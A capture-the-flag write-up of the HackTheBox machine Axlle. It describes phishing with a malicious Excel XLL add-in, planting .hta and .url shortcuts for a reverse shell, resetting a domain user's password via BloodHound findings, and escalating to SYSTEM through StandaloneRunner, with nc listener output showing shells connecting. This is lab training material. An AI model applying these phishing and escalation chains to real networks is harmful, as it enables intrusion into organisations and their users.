Axlle is a hard-difficulty Windows machine from HackTheBox initially dealing with a phishing attack using and XLL Excel add-on file. Later another phishing attempt utilizing .hta web shortcut files in order to land a shell on a new user where we’ll be abusing the Windows Kit’s StandaloneRunner to own the system. It was really fun! Axlle-info-card
PS C:\Users\0xkujen> nmap -A-Pn10.129.217.166 Starting Nmap 7.95 ( https://nmap.org ) at 2024-11-1510:59 W. Central Africa Standard Time Nmap scan report for10.129.217.166 Host is up (0.12s latency). Not shown: 986 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 25/tcp open smtp hMailServer smtpd | smtp-commands: MAINFRAME, SIZE 20480000, AUTH LOGIN, HELP |_ 211DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY 53/tcp open domain Simple DNS Plus 80/tcp open http Microsoft IIS httpd 10.0 |_http-title: Axlle Development | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-11-1510:04:54Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: axlle.htb0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: axlle.htb0., Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Not Found |_http-server-header: Microsoft-HTTPAPI/2.0 Service Info: Host: MAINFRAME; OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in110.75 seconds
We can see that ldap is giving us back the domain name for this machine axlle.htb so let’s go ahead and add that entry to our /etc/hosts file. One more interesting port is 25 for SMTP, it has hMailServer running on it. This can be useful in the future.
Checking the web interface, it looks like a casual one without any special properties or buttons: Web Application
However, scrolling down a bit we can see an interesting message from the developers:
Web Application
The interesting part is this: If you have any outstanding invoices or requests, please email them to [email protected] in Excel format. Please note that all macros are disabled due to our security posture.
From what we can understand from this message, we can email [email protected] with an Excel file (Thinking of it, the machine name aXLLe makes sense now). I instantly get an idea about sending a phishing email with a malicious xll file and see what happens.
Doing some research I stumble upon this page from swisskyrepo . We can inject our malicious script inside this code just like this: (you can generate your malicious powershell script using https://www.revshells.com/ )
BOOL APIENTRY DllMain( HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved ) { switch (ul_reason_for_call) { case DLL_PROCESS_ATTACH: case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break; } return TRUE; }
We put this code inside of note.c file and now we can email it to the “account” address using swaks , of course after compiling the C code with x86_64-w64-mingw32-gcc to make it a valid .xll file:
PS C:\Users\0xkujen> nc -lvnp9001 listening on [any] 9001 ... connect to [10.10.x.x] from (UNKNOWN) [10.129.217.166] 57935 whoami axlle\gideon.hamill PS C:\>
Pivoting to axlle\dallon.matrix - hta injection
The first thing that comes to mind -since we just performed a phishing attack on the hMailServer- is to go and check the mail inbox for any interesting incoming emails, and we do find something interesting:
This email is talking about web shortcuts being put inside of C:\inetpub\testing for automation purposes (all I see is hacking purposes haha). So we could try to create a malicious .hta file and inject it inside of that Directory and see what happens. This article from HackTricks was really userful. This will be my shell.hta file:
So it goes like this: 1- Create your shell.hta malicious script under C:\users\public\documents 2- Create your shell.url under C:\inetpub\testing with its’ contents redirecting towards the hta file 3- Enjoy your shell :)
1 2 3 4 5 6 7
PS C:\Users\0xkujen> nc -lvnp9001 listening on [any] 9001 ... connect to [10.10.x.x] from (UNKNOWN) [10.129.217.166] 60332 whoami axlle\dallon.matrix PS C:\>
We can now run Bloodhound on the machine to see what juicy info we can extract out of it. We can see that our current user dallon.matrix is a member of WEB DEVS group which has ForceChangePassword on jacob.greeny: BloodHound
Let’s change jacob’s password and connect to him (since we can see that he’s member of Remote Management Users):
┌──(kali㉿kali)-[~/Hackthebox/axlle] └─$ evil-winrm -i 10.129.217.166 -u "jacob.greeny" -p 'SuperSecuredPassword0xkujen123!' Evil-WinRM shell v3.5 Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\jacob.greeny\Documents>
Checking the C:/ directory there is an App Development folder that I found empty earlier, but now with this user it has a kbfiltr directory with some interesting stuff in it:
*Evil-WinRM* PS C:\app development\kbfiltr> cat readme.md # Keyboard Translation Program This is an application in development that uses a WDF kbfiltr as the basis for a translation program. The aim of this application is to allow users to program and simulate custom keyboard layouts for real or fictional languages.
## Features - Create custom keyboard layouts for real or fictional languages. - Simulate keyboard inputs using the custom layouts. - Secret codes to switch between languages and logging output.
## Progress - kbfiltr driver - Complete - Keyboard mapping - Complete (hardcoded in driver) - Custom mapping in application layer - In progress - Logging - Complete - Activation of logging - Complete - Simulation of other keyboard layouts - Incomplete - Activation of other keyboard layouts - Incomplete
**NOTE: I have automated the running of `C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64\standalonerunner.exe` as SYSTEM to test and debug this driver in a standalone environment**
## Prerequisites - Windows 10 or higher - Visual Studio 2019 - Windows Driver Kit (WDK) 10
## Getting Started - Clone this repository. - Open the solution file in Visual Studio. - Build the solution in Release mode. - Install the driver by running `.\devcon.exe install .\kbfiltr.inf "*PNP0303"` as Administrator. - Install the driver as an upperclass filter with `.\devcon.exe /r classfilter keyboard upper -keylogger` as Administrator. - Install the application by running the install_app.bat file as Administrator. - Reboot your computer to load the driver. - Launch the application and start programming your custom keyboard layouts.
## Usage ### Programming a Custom Layout - Launch the application. - Click on the Program Layout button. - Select the language forwhich you want to program the layout. - Select the key you want to modify from the list. - Modify the key's scancode and virtual key code as required. - Repeat steps 4 and 5 for all the keys you want to modify. - Save the layout by clicking on the Save Layout button. ### Simulating Inputs - Launch the application. - Click on the Simulate Input button. - Select the language for which you want to simulate the input. - Type in the input in the normal English layout. - Trigger language switch as outlined below (when required). - Verify that the input is translated to the selected language. ### Logging Output - Launch the application. - Turn on logging (shortcuts can be created as explained below) - Use the application as normal. - The log file will be created in the same directory as the application. ## Triggering/Activation - To toggle logging output, set up a shortcut in the options menu. INCOMPLETE - To switch to a different language, press the Left Alt key and the Right Ctrl key simultaneously. INCOMPLETE ## Bugs There are probably several. *Evil-WinRM* PS C:\app development\kbfiltr>
One interesting part is this:
1 2
**NOTE: I have automated the running of `C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64\standalonerunner.exe` as SYSTEM to test and debug this driver in a standalone environment**
Reading this note I instantly think about abusing standalonerunner.exe, and this github repository comes in handy.
Here are the steps to follow: 1- Create a reboot.rsf file with this content:
1 2
myTestDir True
2- Create a myTestDir\working directory 3- Create an empty rsf.rsf file inside of it 4- Create a command.txt file with our malicious reverse shell script inside of the primary x64 execution directory 5- Enjoy your shell :)
I have create this mini script to automate the process since everything gets deleted each few seconds:
